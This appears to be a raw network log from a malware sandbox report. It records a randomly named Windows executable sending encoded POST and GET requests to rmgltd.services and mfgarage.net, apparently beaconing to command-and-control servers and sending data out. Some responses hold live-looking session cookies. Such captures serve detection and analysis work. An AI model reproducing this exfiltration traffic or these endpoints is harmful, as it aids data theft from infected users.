                                              date: Tue, 24 Sep 2024 09:28:18 GMT
                                              server: LiteSpeed


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.11.30499223.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:24.164132118 CEST770OUTPOST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 59 42 69 31 43 2b 71 2f 39 37 6b 68 65 33 33 6c 30 35 6d 69 65 48 73 35 2b 4e 32 6c 71 64 61 42 4c 31 47 32 65 6b 65 4b 70 61 74 71 78 74 34 69 39 38 50 34 4a 76 78 74 33 47 6a 6e 79 73 39 71 51 75 42 44 2f 5a 70 48 37 78 2f 46 58 6c 53 4a 4c 35 53 69 38 42 74 70 38 49 68 30 49 75 2f 78 51 4a 35 72 74 4c 2b 49 58 42 6f 58 4e 50 33 39 54 37 43 30 53 70 68 35 75 4f 4f 71 35 70 7a 32 72 67 58 43 77 6d 6f 64 5a 4a 37 64 4a 76 31 5a 50 75 30 39 42 2f 4d 6e 66 4b 6d 47 45 71 59 33 35 63 6b 6c 31 50 50 54 53 32 55 6f 50 33 66 35 71 36 76 77 44 41 78 42 77 64 45 69 61 36 43 74 2f 77 3d 3d
                                              Data Ascii: 7LY=YBi1C+q/97khe33l05mieHs5+N2lqdaBL1G2ekeKpatqxt4i98P4Jvxt3Gjnys9qQuBD/ZpH7x/FXlSJL5Si8Btp8Ih0Iu/xQJ5rtL+IXBoXNP39T7C0Sph5uOOq5pz2rgXCwmodZJ7dJv1ZPu09B/MnfKmGEqY35ckl1PPTS2UoP3f5q6vwDAxBwdEia6Ct/w==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.11.30499233.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:26.807982922 CEST790OUTPOST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 59 42 69 31 43 2b 71 2f 39 37 6b 68 59 57 48 6c 32 59 6d 69 56 48 73 36 69 64 32 6c 6a 39 61 46 4c 31 4b 32 65 68 76 50 71 70 4a 71 6f 4a 38 69 38 39 50 34 4f 76 78 74 39 6d 6a 69 76 63 39 6a 51 75 63 30 2f 5a 56 48 37 78 72 46 58 67 75 4a 4c 4f 4f 6a 2b 52 74 72 6c 34 68 79 58 2b 2f 78 51 4a 35 72 74 4c 44 6a 58 48 41 58 4e 2f 6e 39 54 5a 71 37 4d 35 68 32 70 4f 4f 71 71 35 7a 79 72 67 58 77 77 6e 30 6e 5a 50 6e 64 4a 75 46 5a 42 66 30 2b 59 50 4d 6c 52 71 6e 42 4e 37 31 61 31 74 77 44 79 34 57 4e 65 31 70 57 44 41 75 6a 33 35 62 79 51 67 4e 73 73 63 70 4b 59 34 44 32 69 32 49 59 74 78 6b 6e 4e 67 32 30 34 66 4e 68 6d 74 6b 4c 62 78 55 3d
                                              Data Ascii: 7LY=YBi1C+q/97khYWHl2YmiVHs6id2lj9aFL1K2ehvPqpJqoJ8i89P4Ovxt9mjivc9jQuc0/ZVH7xrFXguJLOOj+Rtrl4hyX+/xQJ5rtLDjXHAXN/n9TZq7M5h2pOOqq5zyrgXwwn0nZPndJuFZBf0+YPMlRqnBN71a1twDy4WNe1pWDAuj35byQgNsscpKY4D2i2IYtxknNg204fNhmtkLbxU=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.11.30499243.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:29.448133945 CEST2578OUTPOST /0nxw/ HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.rmgltd.services
                                              Referer: http://www.rmgltd.services/0nxw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 59 42 69 31 43 2b 71 2f 39 37 6b 68 59 57 48 6c 32 59 6d 69 56 48 73 36 69 64 32 6c 6a 39 61 46 4c 31 4b 32 65 68 76 50 71 70 42 71 6f 63 6f 69 39 65 6e 34 50 76 78 74 6d 6d 6a 6a 76 63 38 6a 51 75 55 77 2f 5a 59 36 37 7a 54 46 57 46 69 4a 61 76 4f 6a 33 52 74 72 34 49 68 33 49 75 2f 67 51 4a 4a 6e 74 50 6a 6a 58 48 41 58 4e 36 6a 39 56 4c 43 37 4f 35 68 35 75 4f 50 72 35 70 7a 61 72 67 50 67 77 6e 78 61 5a 4e 58 64 4f 5a 68 5a 42 74 4d 2b 59 50 4d 6c 57 71 6e 36 4e 37 35 48 31 73 59 70 79 38 6a 77 65 46 64 57 54 58 48 36 6a 4e 44 55 50 6d 31 38 76 73 35 4c 65 4f 44 46 6f 6c 5a 38 74 69 6f 6a 4d 68 71 34 2f 5a 52 49 2f 73 67 4d 43 48 59 6b 77 30 6f 56 73 66 4b 43 2f 58 35 73 31 55 70 55 6f 67 2b 39 6a 31 6c 36 35 30 64 75 57 6b 76 45 52 75 36 6e 50 44 43 34 43 53 43 45 61 6a 61 47 5a 46 37 68 46 4a 35 42 66 51 4b 74 59 43 47 47 31 6d 42 43 33 75 66 6a 6a 6e 6f 54 64 6e 45 38 6d 41 77 73 57 34 49 75 79 44 31 31 48 37 37 61 50 63 70 70 4e 2f 67 79 42 64 5a 79 54 2b 39 36 42 74 58 2f 72 4b [TRUNCATED]
                                              Data Ascii: 7LY=YBi1C+q/97khYWHl2YmiVHs6id2lj9aFL1K2ehvPqpBqocoi9en4Pvxtmmjjvc8jQuUw/ZY67zTFWFiJavOj3Rtr4Ih3Iu/gQJJntPjjXHAXN6j9VLC7O5h5uOPr5pzargPgwnxaZNXdOZhZBtM+YPMlWqn6N75H1sYpy8jweFdWTXH6jNDUPm18vs5LeODFolZ8tiojMhq4/ZRI/sgMCHYkw0oVsfKC/X5s1UpUog+9j1l650duWkvERu6nPDC4CSCEajaGZF7hFJ5BfQKtYCGG1mBC3ufjjnoTdnE8mAwsW4IuyD11H77aPcppN/gyBdZyT+96BtX/rKx46piv5wQvVSBKWqwQGjUHe1s2TfaZaipincIYPS0+2UuPfNKczCeT7G9W/wZ7eK8+Z4Xj5IRPZvS7rmhr27jq4z1hzpa1YVz/86Zoppx563oYkxZNrqf4Aqbd6w+1hx6lQa5dajqfVEr4zDhtCdtDDvu6nBMQ4ZMvkiVG40jUiYKqJxauHjdHTff2RvVbPI7Rx+WUIyEDFWGEWsMOBXy1gOAfzabHvxYMj3Lp19uofCINzgIMvUQTrI9Qcb2+jGPqjjeJxNHM6D3OLHt0MjcnLok++hoNnemAN9IJPwH8HVIkft4heG1g1kQoS7hikFxN3FpA6JI3/3Of7xn9LZpnYgBwHNF66b5UZYmgHxeHocIizrVV2qgptXfgLoDwqL9xdDKX+2kEUj0wbumap19LhpW3tNZgeIhlkN0X5/aU8zGK/BPjE0bhYRZtgNAF/gctTZJ9tOd5SPfDkN8O6f0QlWWI1gKVkINs25cWTYJF0ae+j2xxm73zaxx06r+mVr0zT/Yh3DqXqbVbdEr0luRtecwDjPvHcmAuZDwtHPGtalIu6z9tUdNfsDftAKcomEqy0V5IhhJxpgTxw91GCzS1bd8Rq5r8glCx6EgHbwyPOAeoL3d/TD+GHHs0rpwM2D5hmwGcGrBwGFzqPvTAsUthlVemEiCpU1eL [TRUNCATED]
                                              Sep 24, 2024 11:28:29.448160887 CEST1329OUTData Raw: 33 30 62 2b 41 4a 6d 30 66 41 4b 66 63 52 41 2f 65 42 75 2b 42 4d 75 46 52 67 4b 65 67 67 36 35 33 76 34 56 48 2f 4f 6e 57 50 75 4c 53 37 45 63 63 66 45 52 77 72 4d 6f 4b 7a 34 72 2f 75 69 38 74 70 2f 6e 64 75 6f 68 36 43 4d 53 58 57 4f 52 2b 74
                                              Data Ascii: 30b+AJm0fAKfcRA/eBu+BMuFRgKegg653v4VH/OnWPuLS7EccfERwrMoKz4r/ui8tp/nduoh6CMSXWOR+tkp1jYL60X7ZgBD0FDKvFdEvlv6WouU0vLwSFMY+BenR6EkUJnxYHAnGUnxNwGV8OwG1SMbH6GkqZfXX7+4yEfVBYHxfzElGIqWgEqS0Ov7LyKOY7Iva+C0Cq9xN6WHUv4S5aJ65CY6r488yfP7UDfyrjj1yKCPZfr


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.11.30499253.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:32.084151030 CEST495OUTGET /0nxw/?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg= HTTP/1.1
                                              Host: www.rmgltd.services
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:32.188455105 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:28:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 7a 65 3d 43 30 6b 6c 56 54 26 37 4c 59 3d 56 44 4b 56 42 4a 4f 41 2f 62 4d 47 52 6a 7a 6e 6e 36 65 53 65 6d 73 38 69 50 6d 63 76 63 76 52 54 47 57 63 59 68 53 41 68 35 70 79 30 76 35 36 38 4a 72 42 41 4e 78 77 78 54 54 64 73 4a 59 78 65 2b 6f 51 35 59 34 38 33 6b 62 73 54 67 79 76 61 50 62 61 32 6c 49 48 6c 72 6c 45 59 4e 76 68 59 74 31 72 2f 64 2b 4d 4a 58 55 43 52 70 6e 69 56 4b 37 62 45 4e 67 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.11.304992685.153.138.113804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:38.093656063 CEST761OUTPOST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6c 66 63 2f 6d 58 37 52 62 35 39 37 63 76 68 55 38 52 56 56 69 74 52 49 68 54 67 6f 68 64 6e 6e 4d 55 73 30 54 64 41 4a 64 58 68 71 6a 62 4c 67 52 73 63 37 64 30 32 61 2b 53 79 2b 70 4c 4f 62 6b 30 6c 72 6f 37 6d 61 4b 58 34 2f 55 4a 47 6a 63 59 4d 50 74 4d 4f 67 46 54 50 33 73 57 37 62 56 32 69 6e 43 70 6b 42 54 4a 6e 7a 50 69 66 53 42 4a 35 50 35 7a 2b 4f 58 55 51 67 31 71 75 7a 42 58 71 43 56 32 4d 56 69 30 41 35 4c 6b 78 57 70 76 4d 37 4a 65 57 69 69 76 4d 68 37 74 35 61 77 59 79 66 67 73 68 4a 6f 77 74 78 61 39 58 64 59 53 44 2b 63 67 3d 3d
                                              Data Ascii: 7LY=85N1Ep1hmbbQlfc/mX7Rb597cvhU8RVVitRIhTgohdnnMUs0TdAJdXhqjbLgRsc7d02a+Sy+pLObk0lro7maKX4/UJGjcYMPtMOgFTP3sW7bV2inCpkBTJnzPifSBJ5P5z+OXUQg1quzBXqCV2MVi0A5LkxWpvM7JeWiivMh7t5awYyfgshJowtxa9XdYSD+cg==
                                              Sep 24, 2024 11:28:38.340349913 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=149; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=Ih3u1RiCyG56SBms66f28646; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=1-1VZhdMf-6ueTIn4yoxtA-_QVepF0luNhlL7d02PmdpdOx6SOndu4OKzIDDY1_fSEd-cD_WZPyPi8wbpuqQOw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=WGTmAZ735tJzCPIMmpkxeh3i8otwApyjOfsI3zi7RUZYDbGCwCq_mAtmmDuj1_Cfirye-eTBVzPdABQcAEc8Nw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=kmC-rQXnV551daTsdzm7un-NEUxgDsVjkYM-_94wxBco287eNUmg6TpkfbcSlnKiBiB2bWcakOIfDF6evl-0dPfjQzck3-R4d2U6wxG74va9ZOlwWjE82D8QwG_PMeJ-VnJ_VUcXFagpwIQd20p_cC3TT9QV0Q92eEHavI64Y8BE7odmnMAnySf9eMljc71hW5oz1xrCAHkvt3V1M6FzM2Y23sD5n6aj-lctY89_VsrI4AyY2Pc_Ub7Vaa5fg5_uz6yW7MywnD3Ix2LRAS48pznF9_QGGWMOJ0SoQivXOVAuUCz7eu90tARBRE
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:38.340362072 CEST240INData Raw: 68 38 67 34 38 43 5f 47 64 4e 74 52 42 59 34 46 76 52 61 68 4d 71 61 4a 44 46 4c 71 35 6c 33 50 6f 54 56 5f 64 52 71 7a 75 6a 37 48 54 4e 37 74 6d 76 52 4f 37 46 6b 42 58 62 67 4a 6d 70 71 31 42 70 57 56 61 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: h8g48C_GdNtRBY4FvRahMqaJDFLq5l3PoTV_dRqzuj7HTN7tmvRO7FkBXbgJmpq1BpWVa; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:38 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:38.340373039 CEST183INData Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 54 75 65 2c 20 32 34 20 53 65 70 20 32 30 32 34
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2Fcontent-length: 0date: Tue, 24 Sep 2024 09:28:37 GMTserver: Sahibinden Web ServersX-Proxy: tmll-34 13,20200X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:38.549211025 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=149; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=Ih3u1RiCyG56SBms66f28646; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=1-1VZhdMf-6ueTIn4yoxtA-_QVepF0luNhlL7d02PmdpdOx6SOndu4OKzIDDY1_fSEd-cD_WZPyPi8wbpuqQOw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=WGTmAZ735tJzCPIMmpkxeh3i8otwApyjOfsI3zi7RUZYDbGCwCq_mAtmmDuj1_Cfirye-eTBVzPdABQcAEc8Nw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:38 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=kmC-rQXnV551daTsdzm7un-NEUxgDsVjkYM-_94wxBco287eNUmg6TpkfbcSlnKiBiB2bWcakOIfDF6evl-0dPfjQzck3-R4d2U6wxG74va9ZOlwWjE82D8QwG_PMeJ-VnJ_VUcXFagpwIQd20p_cC3TT9QV0Q92eEHavI64Y8BE7odmnMAnySf9eMljc71hW5oz1xrCAHkvt3V1M6FzM2Y23sD5n6aj-lctY89_VsrI4AyY2Pc_Ub7Vaa5fg5_uz6yW7MywnD3Ix2LRAS48pznF9_QGGWMOJ0SoQivXOVAuUCz7eu90tARBRE
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.11.304992785.153.138.113804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:40.864876032 CEST781OUTPOST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6d 2f 73 2f 68 33 48 52 4b 70 39 38 54 50 68 55 32 78 56 52 69 73 74 49 68 53 6b 34 68 76 54 6e 4d 32 6b 30 53 66 34 4a 49 58 68 71 37 72 4c 6c 63 4d 63 6b 64 30 79 6f 2b 54 4f 2b 70 50 65 62 6b 31 56 72 6f 71 6d 5a 4b 48 34 48 42 5a 47 6c 43 6f 4d 50 74 4d 4f 67 46 54 4b 73 73 57 6a 62 56 47 53 6e 46 39 49 43 5a 70 6e 79 47 43 66 53 4b 70 35 4c 35 7a 2b 38 58 51 4a 31 31 70 57 7a 42 57 61 43 56 6e 4d 53 6f 30 41 2f 45 45 77 6a 2f 76 4a 67 4f 39 53 46 76 2b 74 37 38 2f 5a 4e 38 76 44 46 39 76 56 4c 37 51 52 63 47 38 36 31 61 51 43 6c 42 6d 30 44 77 4f 5a 36 4b 38 44 4a 51 46 36 72 37 65 53 5a 74 59 34 3d
                                              Data Ascii: 7LY=85N1Ep1hmbbQm/s/h3HRKp98TPhU2xVRistIhSk4hvTnM2k0Sf4JIXhq7rLlcMckd0yo+TO+pPebk1VroqmZKH4HBZGlCoMPtMOgFTKssWjbVGSnF9ICZpnyGCfSKp5L5z+8XQJ11pWzBWaCVnMSo0A/EEwj/vJgO9SFv+t78/ZN8vDF9vVL7QRcG861aQClBm0DwOZ6K8DJQF6r7eSZtY4=
                                              Sep 24, 2024 11:28:41.112001896 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=337; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=1BGtKu8jmWdJBr9i66f28648; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=ODREVGgg9Kq4f9juJ-B-JfDSoTk2x9X-8jIOwM-RHQ6NlYQO_GeoVes87mjYAsHvkE9yhNfa32gfgQfTNwbwiw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=GxE-3Vi5JAMgkzWXoLSdzmhz1CMe0fB_7QzAFPUU97-Sp-CxX5050CCDYGuxzgdgdmqft6Ahyb8Ov-Aooz49eQ; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=f4e6ojsOlcta-4gTgDEBppXCjz4Fn7q2WheixI2KLsHFLVwZIRwi4ui2vb45Bg4zjugQcWpMCzA_DsSIHDX5M7lzncY1zSf5sYJ2K_7C_1Iem_Gsoy0bst2Y2n6vxTS34v_87t_irtFvooISJk9_c3SvF-oRFJvjjcyZBvP8Wp8kNqMrA--7ZjalWf5PlDiivlklRPiYXCt3ptMOYp9X3Z7r_J-mLwfMhfxPPlONmPGXDGnoBToP1UGiDwNJDx-V-25aQyGEm62lh5L0U9sbmQpLCjqvfhkFYaCxgavPSv6Ddd8QV22bPeVyEb
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:41.112015963 CEST240INData Raw: 76 4f 6c 70 36 4a 65 69 35 77 78 51 6c 51 52 76 34 51 31 37 49 38 36 79 41 56 41 51 62 39 63 49 55 7a 66 61 59 73 34 44 30 38 5a 6f 6d 55 50 64 74 76 6c 44 42 33 32 74 47 6a 72 73 71 65 35 6a 4e 31 50 64 32 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: vOlp6Jei5wxQlQRv4Q17I86yAVAQb9cIUzfaYs4D08ZomUPdtvlDB32tGjrsqe5jN1Pd2; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:40 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:41.112026930 CEST182INData Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 54 75 65 2c 20 32 34 20 53 65 70 20 32 30 32 34
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2Fcontent-length: 0date: Tue, 24 Sep 2024 09:28:40 GMTserver: Sahibinden Web ServersX-Proxy: tmll-22 9,20200X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:41.318276882 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=337; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=1BGtKu8jmWdJBr9i66f28648; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=ODREVGgg9Kq4f9juJ-B-JfDSoTk2x9X-8jIOwM-RHQ6NlYQO_GeoVes87mjYAsHvkE9yhNfa32gfgQfTNwbwiw; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=GxE-3Vi5JAMgkzWXoLSdzmhz1CMe0fB_7QzAFPUU97-Sp-CxX5050CCDYGuxzgdgdmqft6Ahyb8Ov-Aooz49eQ; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:40 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=f4e6ojsOlcta-4gTgDEBppXCjz4Fn7q2WheixI2KLsHFLVwZIRwi4ui2vb45Bg4zjugQcWpMCzA_DsSIHDX5M7lzncY1zSf5sYJ2K_7C_1Iem_Gsoy0bst2Y2n6vxTS34v_87t_irtFvooISJk9_c3SvF-oRFJvjjcyZBvP8Wp8kNqMrA--7ZjalWf5PlDiivlklRPiYXCt3ptMOYp9X3Z7r_J-mLwfMhfxPPlONmPGXDGnoBToP1UGiDwNJDx-V-25aQyGEm62lh5L0U9sbmQpLCjqvfhkFYaCxgavPSv6Ddd8QV22bPeVyEb
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.11.304992885.153.138.113804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:43.631062984 CEST1220OUTPOST /xzdz/ HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.mfgarage.net
                                              Referer: http://www.mfgarage.net/xzdz/
